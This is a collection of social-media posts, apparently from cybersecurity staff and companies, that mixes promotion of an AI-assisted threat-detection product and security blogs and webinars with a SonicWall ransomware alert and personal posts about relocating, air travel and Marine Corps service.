Jason Vest

@HackingLZ @FasterHorses_ Good move

@FasterHorses_ Yea I’m right outside of Buffalo I’m moving to Texas.

Working with a cleaning company to help prep the house before listing they said it’s their 7th call this month with someone moving out of state.

“Iran is just looking for those little, tiny flaws within our infrastructure that they can use to create as much havoc as possible.” @TrustedSec & @Binary_Defense founder David Kennedy urges American companies to remain on high alert following an Iranian-linked cyberattack. @DanaPerino

Some pentesters may say that #PowerShell is dead, but is it? In the third post of this series, @Carlos_Perez explains how PowerShell's native logging captures deobfuscated code before it executes, giving defenders the visibility they need. Read it now! hubs.la/Q046ddjL0

Here's a demo on a project I've been developing and working on for the past 9 months. Called NightBeacon. Using it now in production, getting released fully this week. Our own internally trained models on our own infrastructure (no third party). Trained on our analysts knowledge and behavior (TP/FPs retrain model to be smarter with context). Handles emails (including tonality), attachments, various malicious filetypes (DLL/exe/svg/lnk/etc). Can send it full evtx exports, packet dumps, zip files, whatever. Universal log handler can parse any log from any source, EDR, SIEM, etc. Deep-Scan / sandbox detonation + shellcode emulation with IOC extraction automatically. Automatic playbook generation, full AI-based recommendations custom to the attack. Synthetic training data layer - meaning when it trains on a specific attack at a customer, generates training data based on the customers data but never has any of the actual data or information about the customer in it. No customer information. For areas its weak at, bubbles up and automatically kicks off research to become smarter on a specific topic. Supports GenAI based rulesets (to improve confidence), over 900+ YARA rules, full MITRE ATT&CK integration. Integrated into our SOAR - enriches data, creates playbooks for analysts, MTTR reduces substantially, false positives reduced, true positive escalations. Not using our MDR service? Can integrate into your EDR or SIEM for automatic enrichment and escalation of attacks. Built to help respond faster. More accurately. Be intelligent based on our analysts intelligence. Stop attackers much much faster. Coming soon.. #BinaryDefense

Here is a live demo of our AI solution I've been building non-stop over the past 8 months @Binary_Defense. How it works: Our own model trained on our analysts behavior. Our analysts submit tickets as false positives/true positives with context which enriches our LLM to be smarter over time. Key Highlights: If its a binary - will automatically spin up an agent for reverse engineering it and using EMBER ML to understand behavior and intent of the binary. File formats: Supports a vast array of pretty much any filetype, including email attachments like SVG, LNK, etc. Can handle DLLs, ELF, EXEs, PDF, XLS, DOC, etc. Interrogates the full chain of all events irrespective of log sources. Can handle any format of logs and integrates into APIs of customers for additional agentic data looping for confidence ranking when needed. This is an example of the back-end UI, this is transparent to analysts and enriches the alarms automatically in our SOAR. In these examples there's three different types: 1. Regsvr32 + sct downloader + scrobj.dll code execution - checks reputation of domain, pulls in threat intel, looks at entire picture of the chain - downloads the file itself and inspects for code analysis. Determines if malicious as well as historically looking back if seen in customer before in past. 2. Powershell Obfuscation - uses a universal decoder to un-obfuscate powershell and look at the raw code. Can handle pretty much any obfuscation thrown at it (thanks @HackingLZ). 3. Email with malicious SVG - checks tonality of email, are they creating urgency to take action (increases confidence) - disassembles SVG to understand malicious content - checks URL to determine if harvesting credentials, payload delivery, etc. Creates an entire kill chain analysis with full response and dissecting of the attack to the analyst in seconds. Has greatly sped up our ability to respond to incidents and allowing analysts to focus on the most important alarms through prioritization. Once cool thing I've worked heavily on is a synthetic data normalizer which when an analyst says "Yes this is bad with context" or "No this is a false positive" - our local model generates training data to be smarter in the future without using the actual customer data to train it. The customers actual data is immediately destroyed once training data off of the original alarm is generated and contains no customer-centric data at all. We also have three model tiers. Opt-In (collective model, again no customer data but every organization contributes to training). Opt-Out - does not train on any customer data for customers who opt-out. Private LLM - LLM created specifically for individual customer and trains only off of their data. Uses shared model collective for better confidence rankings. It will generate automated playbooks to run based on confidence rankings to take action on behalf of the customer. Still human driven on execution - has to approve playbook actions. This thing is cooking and so cool to see this work live and shut down attackers much faster! If confidence ranking is low - will automatically attempt to enrich data through customer environments for better confidence rankings. Additionally if the model isn't trained well on a certain technology, I have created something we call "Nexus" that will research new protocols, devices, SDKs, etc and generate training data automatically. Works well for zero-days for example, point to a tweet, or a research paper, and automatically generates training data to recognize this attack much faster. Have over 8000+ yara rule integrations that help with confidence boosting as well that is automatically incorporated into the analysis. Creating some amazing stuff at Binary Defense that isn't marketing fluff - actionable things that are making a huge difference in this industry. #BinaryDefense

Good read and research on malicious SVG file analysis and how it's weaponized by Adam Paulina @Binary_Defense binarydefense.com/resources/blog… #BinaryDefense

Great blog post from Jordan @Binary_Defense: Slivering Through The Cracks binarydefense.com/resources/blog… #BinaryDefense

Microsoft seems to be integrating #Copilot into everything. And we mean EVERYTHING. Find out what we have to say about it and how it relates to data security on the latest episode of the #SecurityNoise podcast! @hoodoer hubs.la/Q0410rHb0

Life changing opportunity

Most ransomware attacks are not missed because the data is gone. They are missed because the signal gets buried. The clip below shows why a smarter, unified SoC is becoming the new standard. The visibility is there. The context is not. Watch the clip, then check out the full webinar to see how teams are transforming detection and response with the right AI powered approach. binarydefense.com/webinars/rearc…

Join us for our next #Discord Livestream on December 4 at 11:00AM ET! @oddvarmoe will discuss his research outlined in his blog: Hack-cessibility: When DLL Hijacks Meet Windows Helpers. Don't miss your chance to ask questions and see live demos! trustedsec.com/about-us/event…

this is a never give up effort play you show to your kids what a play by Alijah Clark from blocked flat on his back to forcing a fumble 50 yards downfield 🔥🔥

Olmsted Falls cybersecurity high school program at #TrustedSec HQ this morning and here teaching them what it looks like to have a career in this industry. Love this !

@AmandaMAtwell @AmericanAir The “departure time” you are tracking is actually “push back from the gate time” Actual take-off time is accounted for and not published to you.

I don’t think I have a single @AmericanAir flight that has taken off on time this year. Even if we board on time. Sit on the tarmac for 30 minutes without explanation? Why not! 😒

@HackingDave @HackingLZ @BladeOfTheRonin but

I've had this discussion with my son many times who wants to become a Marine also. He's 15, and I've actually tried talking him out of it and to go air force but he won't listen 😂 Here's what I try to explain to him - nothing in the Marines is impossible, it's all doable and it's something that almost anyone can do. The biggest challenge is it's a substantial life change and you have to get used to it quickly. Personally, it's no different than going off to college and living on your own, but it is still vastly different and something that matures you super fast. You go from seeing your family everyday, to maybe once a year or if you visit (as my parents did), a few times. Boot camp isn't really hard, its just the sheer shock of the whole experience, and them breaking you down so you can be an awesome Marine. The crucible, the PFTs, the gas chamber, all super easy stuff tbh, but one thing Marines really teach you is how to accomplish things you don't think you can do. Life lesson that still follows me today. I would suggest finding a career in the Marines that translates to the outside world well. That's the biggest challenge I see from those that decide not to stay in as a career Marine/retire. For me, I got lucky getting into intel and cybersecurity which was a seamless transition to private sector. Some of the fondest memories I have in life are from the Marines - and something that I would never change. Nothing beats walking back from the crucible and them handing you an Eagle, Globe, and Anchor and calling you a Marine for the first time.

Huntress is seeing multiple threat actors hit networks via SonicWall devices, even when MFA is enabled. Pivot straight to DC. Suspected ransomware (Akira). If you’re running SonicWall VPN, read this now:

#AI is changing how we work, build, and make decisions. But with that opportunity comes a new kind of responsibility: understanding what these tools are doing, and how to keep them safe. With the right visibility and controls in place, AI can be a competitive advantage, not a #security liability. Read the full breakdown from our CTO, @Jason__V__, on @Forbes: bit.ly/4nsbawi

theverge.com/news/692637/mi… This could get interesting

11 years. Thousands of threats stopped. One mission: protect people. Today we celebrate the real heroes, our team of defenders who've spent each and every day making sure YOU can sleep at night. They don't just monitor threats. They hunt them. And we couldn't be prouder. Here's to making the digital world safer, one threat at a time. #11YearsStrong #Cybersecurity